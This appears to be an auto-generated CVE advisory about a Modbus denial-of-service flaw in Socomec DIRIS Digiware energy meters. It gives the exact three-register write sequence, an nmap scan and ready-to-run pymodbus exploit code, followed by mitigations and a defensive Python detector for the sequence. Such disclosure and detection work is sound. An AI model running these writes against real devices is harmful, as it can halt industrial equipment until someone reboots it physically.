The vulnerability exploits the Modbus RTU over TCP service on port 503. An unauthenticated attacker sends a specific sequence of Write Single Register (function code 6) requests, reprogramming the device’s Modbus address to induce a denial-of-service state. The attack sequence is: first, write value 1000 to register 58112, signaling an impending config change. Second, write the desired rogue Modbus address to register 29440. Finally, write value 161 to register 57856 to commit the change. This illegitimate reconfiguration corrupts the device’s communication stack, causing it to stop responding to legitimate Modbus queries and requiring a physical reboot to restore functionality.
DailyCVE Form:
Platform: Socomec DIRIS Digiware
Version: 1.6.9
Vulnerability: Denial of Service
Severity: Critical
Date: 12/01/2025
Prediction: 01/15/2026
What Undercode Say:
sudo nmap -p 503 --script modbus-discover <target_ip>
from pymodbus.client import ModbusTcpClient
client = ModbusTcpClient('<target_ip>', port=503)
client.write_register(58112, 1000)
client.write_register(29440, <new_addr>)
client.write_register(57856, 161)
tcpdump -i any port 503 -w modbus_attack.pcap
How Exploit:
1. Identify target on port 503.
2. Send Write Register to 58112=1000.
3. Send Write Register to 29440=<new_addr>.
4. Send Write Register to 57856=161.
5. Device stops responding.
Protection from this CVE:
Block port 503.
Network segmentation.
Apply vendor patch.
Use access control lists.
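Alongside these mitigations, the three-write sequence described above can be detected on the wire. The following Python is an added example, not code from the advisory or the vendor: it assumes each TCP payload on port 503 carries one raw Modbus RTU frame (unit, function, register, value, CRC16), and the helper names and sample frames are constructed for illustration.

```python
import struct

# Register/value steps of the reconfiguration sequence described on this page.
SEQUENCE = [(58112, 1000), (29440, None), (57856, 161)]  # None = any value
WRITE_SINGLE_REGISTER = 0x06

def crc16_modbus(data: bytes) -> int:
    crc = 0xFFFF
    for byte in data:
        crc ^= byte
        for _ in range(8):
            crc = (crc >> 1) ^ 0xA001 if crc & 1 else crc >> 1
    return crc

def parse_rtu_write(frame: bytes):
    """Return (unit, register, value) for a valid FC 6 RTU frame, else None."""
    if len(frame) != 8:
        return None
    unit, func, reg, val = struct.unpack(">BBHH", frame[:6])
    (crc,) = struct.unpack("<H", frame[6:])  # CRC is sent low byte first
    if func != WRITE_SINGLE_REGISTER or crc != crc16_modbus(frame[:6]):
        return None
    return unit, reg, val

class SequenceDetector:
    """Tracks, per source IP, progress through the three-write sequence."""
    def __init__(self):
        self.progress = {}

    def observe(self, src_ip: str, frame: bytes) -> bool:
        parsed = parse_rtu_write(frame)
        if parsed is None:
            return False  # reads and malformed frames leave state unchanged
        _, reg, val = parsed
        step = self.progress.get(src_ip, 0)
        want_reg, want_val = SEQUENCE[step]
        if reg == want_reg and want_val in (None, val):
            step += 1
        elif (reg, val) == SEQUENCE[0]:
            step = 1  # sequence restarted from its first write
        if step == len(SEQUENCE):
            self.progress[src_ip] = 0
            return True  # full sequence seen from this source: alert
        self.progress[src_ip] = step
        return False

def make_frame(unit: int, reg: int, val: int) -> bytes:
    """Build a constructed FC 6 sample frame for exercising the detector."""
    body = struct.pack(">BBHH", unit, WRITE_SINGLE_REGISTER, reg, val)
    return body + struct.pack("<H", crc16_modbus(body))
```

Unrelated writes between the three steps do not reset the tracker, so interleaved traffic does not hide the sequence; a production rule would also expire per-source state after a time window.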
Impact:
Complete service disruption.
Requires physical reboot.
Operational technology halted.
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

